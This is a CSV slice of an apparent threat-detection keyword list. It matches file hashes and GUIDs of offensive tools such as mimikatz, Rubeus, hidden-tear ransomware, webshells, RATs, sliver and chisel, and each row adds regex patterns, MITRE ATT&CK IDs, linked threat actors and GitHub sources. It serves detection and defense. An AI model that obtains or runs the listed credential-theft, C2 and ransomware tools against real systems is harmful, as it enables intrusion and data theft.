"*658C8B7F-3664-4A95-9572-A3E5871DFC06*",".{0,1000}658C8B7F\-3664\-4A95\-9572\-A3E5871DFC06.{0,1000}","offensive_tool_keyword","Rubeus","Run Rubeus via Rundll32 (potential application whitelisting bypass technique)","T1558.004 - T1098 - T1110.001 - T1555.003 - T1218.011 - T1085 - T1070.004","TA0005 - TA0002 - TA0006 - TA0008 - TA0009","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/rvrsh3ll/Rubeus-Rundll32","1","0","#GUIDproject","N/A","10","3","200","32","2020-04-25T19:55:27Z","2020-04-24T20:35:38Z","28062"
"*658C8B7F-3664-4A95-9572-A3E5871DFC06*",".{0,1000}658C8B7F\-3664\-4A95\-9572\-A3E5871DFC06.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","28063"
"*659e8eac2bd33a73a5562f8af3abee9ce6dcd747abe0d52ecf63f252ca79b2b2*",".{0,1000}659e8eac2bd33a73a5562f8af3abee9ce6dcd747abe0d52ecf63f252ca79b2b2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28065"
"*65a3e8e51550a616e1804c6dc4002ffb4a70bb7d38edaf50bc582a7f80a41345*",".{0,1000}65a3e8e51550a616e1804c6dc4002ffb4a70bb7d38edaf50bc582a7f80a41345.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28067"
"*65adc037481a4fea2f113daaa322d5970c4136a81ccc21921c3ff6fb82e3aad3*",".{0,1000}65adc037481a4fea2f113daaa322d5970c4136a81ccc21921c3ff6fb82e3aad3.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","28068"
"*65b60edaca65b2e91c9c8b1006efd29087b58b96adeda130787e77801ccf6682*",".{0,1000}65b60edaca65b2e91c9c8b1006efd29087b58b96adeda130787e77801ccf6682.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28071"
"*65b73f44795c9d8a7ac35a5d730787d72c2ceaa15ff0a8788038bee7b56edf48*",".{0,1000}65b73f44795c9d8a7ac35a5d730787d72c2ceaa15ff0a8788038bee7b56edf48.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","28072"
"*65cf10c4827342b6b8a8f2d5d094e300e41d4a3924efb8865e633d6be7fac3e6*",".{0,1000}65cf10c4827342b6b8a8f2d5d094e300e41d4a3924efb8865e633d6be7fac3e6.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28073"
"*65cf6179c85728317f11460314779b365ba77199352a2b11624729f788daf6bc*",".{0,1000}65cf6179c85728317f11460314779b365ba77199352a2b11624729f788daf6bc.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","#filehash","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","28074"
"*65d2c2559bab3590761c7d856d14bcccf2bcc3f2f25ac6ff0d3e1a62de49540b*",".{0,1000}65d2c2559bab3590761c7d856d14bcccf2bcc3f2f25ac6ff0d3e1a62de49540b.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","28075"
"*65d40e2b26a32fa02e585c939c5c59e97d0d11629197b0826f837b402f8e9b50*",".{0,1000}65d40e2b26a32fa02e585c939c5c59e97d0d11629197b0826f837b402f8e9b50.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28076"
"*65d48351ff1feb4d9577b9a8e395ab5c00804d38cf28f10b2386a57047cce489*",".{0,1000}65d48351ff1feb4d9577b9a8e395ab5c00804d38cf28f10b2386a57047cce489.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28077"
"*65d4c633bf347ed4766dbb6e003776a017ccb632d73c6138c3e880a94c114c2d*",".{0,1000}65d4c633bf347ed4766dbb6e003776a017ccb632d73c6138c3e880a94c114c2d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28078"
"*65d4d3773e423e48fa467c5765c8ca4ea298ae71e0a0bedd387fdd3ab2989870*",".{0,1000}65d4d3773e423e48fa467c5765c8ca4ea298ae71e0a0bedd387fdd3ab2989870.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28079"
"*65d963e0cd748cc7599afd69a0f961742b17cb46d67414ce8e9cccc087b59342*",".{0,1000}65d963e0cd748cc7599afd69a0f961742b17cb46d67414ce8e9cccc087b59342.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28080"
"*65dd5aa4e6cc05a7bd84be96d769806dfbe19c8c0451c13445100597fe4698d0*",".{0,1000}65dd5aa4e6cc05a7bd84be96d769806dfbe19c8c0451c13445100597fe4698d0.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","28081"
"*65ddc082f73224383dfe8d9662a428b281c42ea1be7f11f7da241d672dd56a0b*",".{0,1000}65ddc082f73224383dfe8d9662a428b281c42ea1be7f11f7da241d672dd56a0b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28082"
"*65dfba472014bb6e61d6f287452dcc099edabf4ba09cb196a27507298077fa75*",".{0,1000}65dfba472014bb6e61d6f287452dcc099edabf4ba09cb196a27507298077fa75.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","28083"
"*65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c*",".{0,1000}65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28084"
"*65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c*",".{0,1000}65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28085"
"*65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c*",".{0,1000}65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28086"
"*65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c*",".{0,1000}65e079dc332288ae073da86cf89666ad53b74e049379625654fe0be59ed9394c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28087"
"*65E26974FA14B95E42DE9662308EAC9042E06DD5FDC0987BC1D73FEF2ED2F4FD*",".{0,1000}65E26974FA14B95E42DE9662308EAC9042E06DD5FDC0987BC1D73FEF2ED2F4FD.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","28088"
"*65e2792774eff8fec2ccb9280300fca6f465c06df13c4bcebb553b18c4aafc2b*",".{0,1000}65e2792774eff8fec2ccb9280300fca6f465c06df13c4bcebb553b18c4aafc2b.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","28089"
"*65ed54763a97588f5ace7c38d2cdbcf925dd65f2d5fb3ca1548b23c7efb54efd*",".{0,1000}65ed54763a97588f5ace7c38d2cdbcf925dd65f2d5fb3ca1548b23c7efb54efd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28090"
"*65efc0f2db588996d96021ce4be127ac2b18800d9d35c8a1a5aa7d3140370330*",".{0,1000}65efc0f2db588996d96021ce4be127ac2b18800d9d35c8a1a5aa7d3140370330.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28091"
"*65f5366b645bcc846eb270d514fd8f1c777a3a7b7534a6364e251268e9741346*",".{0,1000}65f5366b645bcc846eb270d514fd8f1c777a3a7b7534a6364e251268e9741346.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","28093"
"*66012c3a70e772908a9e8571665562fad55a04447452b751719a80d20ebf83e7*",".{0,1000}66012c3a70e772908a9e8571665562fad55a04447452b751719a80d20ebf83e7.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","28095"
"*660309440ef382c2966a9186161e0777d4e4fbd7b0acce8ef040e43609513282*",".{0,1000}660309440ef382c2966a9186161e0777d4e4fbd7b0acce8ef040e43609513282.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","28096"
"*6634da3e8e2590317704a1ddcba7fcc177aa5f532d81717431d0a6668d9594c8*",".{0,1000}6634da3e8e2590317704a1ddcba7fcc177aa5f532d81717431d0a6668d9594c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28104"
"*663792a8eca37f76270dae1ebc24d3c29bd028457478f2b505839f9303818648*",".{0,1000}663792a8eca37f76270dae1ebc24d3c29bd028457478f2b505839f9303818648.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28106"
"*663a4660da761fa144f2b5a591f84a081d29f62d881d9d24d8f5e0e8e5341a84*",".{0,1000}663a4660da761fa144f2b5a591f84a081d29f62d881d9d24d8f5e0e8e5341a84.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28107"
"*6641564c893c3cb1dff02607a922afdaaa48ba93b0bc35cc90094fb653ee3dba*",".{0,1000}6641564c893c3cb1dff02607a922afdaaa48ba93b0bc35cc90094fb653ee3dba.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28108"
"*6646a6c4e3006b90ff7009eb28cd9d5ff182d7f4d8465dbe63357a8c054257bb*",".{0,1000}6646a6c4e3006b90ff7009eb28cd9d5ff182d7f4d8465dbe63357a8c054257bb.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28109"
"*664ed4839518dc4ca3c904778f4deee7ea0b0ba0baabd9d2de4c4b9d9b81b77a*",".{0,1000}664ed4839518dc4ca3c904778f4deee7ea0b0ba0baabd9d2de4c4b9d9b81b77a.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28111"
"*66504e8c044a01ed3ef2a97dd36de68b7b1913d737d6ad4e6bd7778d80dec92f*",".{0,1000}66504e8c044a01ed3ef2a97dd36de68b7b1913d737d6ad4e6bd7778d80dec92f.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#filehash","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","28112"
"*66512a2c31adfe77fb66c2c824e55509ba2cce70d158e850f0e56e3dc664f420*",".{0,1000}66512a2c31adfe77fb66c2c824e55509ba2cce70d158e850f0e56e3dc664f420.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28113"
"*665593018e2d7938198172532fad4e17c501253b1a75106904d0eb50bf2b8c75*",".{0,1000}665593018e2d7938198172532fad4e17c501253b1a75106904d0eb50bf2b8c75.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28115"
"*665a22568c5d38db4ce74dde13053e8a66baf91356e4f35a9e2957c205a09f1a*",".{0,1000}665a22568c5d38db4ce74dde13053e8a66baf91356e4f35a9e2957c205a09f1a.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#filehash #linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","28116"
"*665b1b72ff02156034706a2a4548ac10a338bb350d6f09218b9ce0f53c4d87a8*",".{0,1000}665b1b72ff02156034706a2a4548ac10a338bb350d6f09218b9ce0f53c4d87a8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28117"
"*6678fb7c21974e7dbc5948f6c057f0bc4204e7bcd562c5477550f4bb844eba2f*",".{0,1000}6678fb7c21974e7dbc5948f6c057f0bc4204e7bcd562c5477550f4bb844eba2f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28121"
"*668718b8b09f631c3f1fa81519b99b83792a2e84d306296997a28db2e4f90d8c*",".{0,1000}668718b8b09f631c3f1fa81519b99b83792a2e84d306296997a28db2e4f90d8c.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28124"
"*668a6e83e72ffc8aa7d36949aad3aefca4b676b996ec099bde25edb52a56f913*",".{0,1000}668a6e83e72ffc8aa7d36949aad3aefca4b676b996ec099bde25edb52a56f913.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28125"
"*6690cb6d6fa47260c2cf4ac43b64d2d46e7a7ae4f8d0f10f4fce5d423a1dacad*",".{0,1000}6690cb6d6fa47260c2cf4ac43b64d2d46e7a7ae4f8d0f10f4fce5d423a1dacad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28126"
"*66924A72494CDBBE223AE81A49AAA2A47DAD741CBC5D180FA85C66ACE641DC35*",".{0,1000}66924A72494CDBBE223AE81A49AAA2A47DAD741CBC5D180FA85C66ACE641DC35.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","28128"
"*66928c3316a12091995198710e0c537430dacefac1dbe78f12a331e1520142bd*",".{0,1000}66928c3316a12091995198710e0c537430dacefac1dbe78f12a331e1520142bd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28129"
